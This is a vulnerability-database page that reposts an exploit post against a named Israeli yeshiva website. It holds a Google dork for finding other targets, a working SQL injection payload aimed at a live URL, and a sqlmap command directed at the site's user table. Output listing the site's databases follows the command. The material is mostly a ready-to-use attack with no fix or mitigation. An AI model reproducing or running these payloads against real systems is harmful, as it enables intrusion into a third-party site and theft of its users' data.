YELM ישיבת אלון מורה Sql İnjection Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1650541 漏洞类型
发布时间 2019-07-01 更新时间 2019-07-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019070003
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-----------------------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: Yelm ישיבת אלון מורה Sql İnjection Vulnerability
# Author : Cerkuday
# Google Dork : intile:"ישיבת אלון מורה" id=
# Tested on : Windows 10
# Date : 01.07.2019
# Vendor Home: http://www.yelm.co.il/
# Forum : http://www.Cyber-warrior.org/
------------------------------------------------------------------------------------------------------------------------------------------------

demo:http://www.yelm.co.il/ask_show.asp?id=294650

PoC 


http://www.yelm.co.il/ask_show.asp?id=296488 AND 8059 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8059=8059) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)))


sqlmap -u "http://www.yelm.co.il/ask_show.asp?id=296488" --level=2 --risk=2  --random-agent --text-only --batch -v 3 -D kipa -T tbl_Egeret_users --columns

 available databases [8]:
[*] babetov
[*] kipa
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb